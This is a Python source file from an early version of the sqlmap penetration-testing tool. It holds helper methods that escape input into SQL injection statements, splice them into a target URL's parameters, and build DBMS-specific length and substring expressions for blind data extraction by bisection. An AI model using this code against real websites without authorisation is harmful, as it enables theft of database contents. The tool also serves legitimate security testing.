#!/usr/bin/env python


import logging
import re
import sys
import time

from lib.algorithm import Algorithm


version = "0.4"


class Common(Algorithm):
    """
    This class defines common methods used in many other parts
    of sqlmap

    @author: Bernardo Damele and Daniele Bellucci
    """

    def injectionStm(self, string, singleString=False, doubleString=False):
        """
        This method defines how the input string has to be escaped
        to perform the injection depending on the injection method
        identified as valid
        """

        if self.args.injectionMethod == "numeric":
            stm = "%s" % string
        elif self.args.injectionMethod == "stringsingle":
            if singleString:
                stm = "'%s" % singleString
            else:
                stm = "'%s" % string
        elif self.args.injectionMethod == "stringdouble":
            if doubleString:
                stm = "\"%s" % doubleString
            else:
                stm = "\"%s" % string

        return stm


    def urlReplace(self, parameter="", value="", newValue=""):
        """
        This method replaces the affected url parameter with the SQL
        injection statement to request
        """

        if not self.args.injParameter:
            return self.args.url.replace("%s=%s" % (parameter, value),
                                         "%s=%s" % (parameter, newValue))
        else:
            value = self.args.parameters[self.args.injParameter]
            return self.args.url.replace("%s=%s" % (self.args.injParameter, value),
                                         "%s=%s" % (self.args.injParameter, value + newValue))


    def roughParameters(self):
        """
        This method checks if the target has parameters then split the
        url from its parameters
        """

        if "?" in self.args.url:
            url, parameters = self.args.url.split("?")
        elif self.args.googleDork:
            warnMsg  = "the target url has not parameters "
            warnMsg += "so it is not possible to test SQL "
            warnMsg += "injection on it, skipping to next url"
            self.logger.warn(warnMsg)

            return None, None
        else:
            errMsg  = "you did not provide the parameters "
            errMsg += "in the target url"
            raise Exception, errMsg

        return url, parameters


    def paramDict(self, parameters):
        """
        This method split the parameter names from their value and save
        the data into a dictionary
        """

        testableParams = {}

        for element in parameters.split("&"):
            elem = element.split("=")
            if len(elem) == 2:
                parameter = elem[0]

                condition  = not self.args.urlParameter
                condition |= parameter in self.args.urlParameter

                if condition:
                    value = elem[1]
                    if value:
                        testableParams[parameter] = value

        if self.args.urlParameter and not testableParams:
            if len(self.args.urlParameter) > 1:
                warnMsg  = "the testable parameters you provided "
                warnMsg += "are not into the target url"
            else:
                parameter = self.args.urlParameter[0]

                warnMsg  = "the testable parameter '%s' " % parameter
                warnMsg += "you provided is not into the target url"

            if self.args.googleDork:
                warnMsg += ", skipping to next url"
                self.logger.warn(warnMsg)
            else:
                raise Exception, warnMsg
        elif len(self.args.urlParameter) != len(testableParams.keys()):
            for parameter in self.args.urlParameter:
                if parameter not in testableParams.keys():
                    warnMsg =  "the testable parameter '%s' " % parameter
                    warnMsg += "you provided is not into the target url"
                    self.logger.warn(warnMsg)

        return testableParams


    def parseFp(self, dbms, fingerprint):
        """
        This method format the remote DBMS fingerprint output
        """

        fp = dbms

        if len(fingerprint) == 0:
            return "%s" % fp
        elif len(fingerprint) == 1:
            return "%s %s" % (fp, fingerprint[0])
        else:
            for value in fingerprint:
                fp += " %s and" % value

            return fp[:-4]


    def getHtmlErrorFp(self):
        htmlParsed = ""

        if not self.args.htmlFp:
            return None

        if len(self.args.htmlFp) == 1:
            htmlVer = self.args.htmlFp[0]
            htmlParsed = htmlVer
        elif len(self.args.htmlFp) == 2:
            htmlVer0 = self.args.htmlFp[0]
            htmlVer1 = self.args.htmlFp[1]
            htmlParsed = "%s or %s" % (htmlVer0, htmlVer1)

        return htmlParsed


    def queryVars(self, expression):
        expressionUnescaped = self.unescape(expression)

        if re.search("\ASELECT ", expression, re.I):
            method = "SELECT"
        else:
            method = None

        if not self.args.fingerprint:
            return expressionUnescaped, None, None, method

        if "MySQL" in self.args.fingerprint:
            firstDbStr = "LENGTH(%s)"
            secondDbStr = "MID((%s), %d, %d)"
        elif "PostgreSQL" in self.args.fingerprint:
            firstDbStr = "LENGTH(%s)"
            secondDbStr = "SUBSTR((%s), %d, %d)"
        elif "Microsoft SQL Server" in self.args.fingerprint:
            firstDbStr = "LTRIM(STR(LEN(%s)))"
            secondDbStr = "SUBSTRING((%s), %d, %d)"
        else:
            errMsg = "Unable to fingerprint remote DBMS"
            raise Exception, errMsg

        return expressionUnescaped, firstDbStr, secondDbStr, method


    def queryLength(self, expression, baseUrl):
        """
        This method calculates and returns a query output length
        """

        expressionUnescaped, firstDbStr, secondDbStr, method = self.queryVars(expression)

        selectTopExpr = re.search("\ASELECT TOP\s+[\d]+\s+([\w\-\_\'\"\,\;\(\)\@\ ]+) FROM", expression, re.I)
        selectExpr = re.search("\ASELECT ([\w\-\_\'\"\,\;\(\)\@\ ]+) FROM", expression, re.I)
        miscExpr = re.search("\A(.+)", expression, re.I)

        if selectTopExpr or selectExpr:
            if selectTopExpr:
                regExpr = selectTopExpr.groups()[0]
            elif selectExpr:
                regExpr = selectExpr.groups()[0]
        elif miscExpr:
            regExpr = miscExpr.groups()[0]

        if not self.args.fingerprint:
            return None, None, None

        if ( method == "SELECT" and re.search("\A(COUNT|LTRIM)\(", regExpr, re.I) ) or ( len(regExpr) <= 1 ):
            return None, None, None

        if method == "SELECT":
            newExpr = expressionUnescaped.replace(regExpr, firstDbStr % regExpr, 1)
        else:
            newExpr = firstDbStr % expressionUnescaped

        if self.args.verbose == 1:
            sys.stdout.write("[%s] [INFO] retrieved the length of query output: " % time.strftime("%X"))
            sys.stdout.flush()

        count, length = self.bisectionAlgorithm(baseUrl, newExpr, log=False)

        return count, length, regExpr
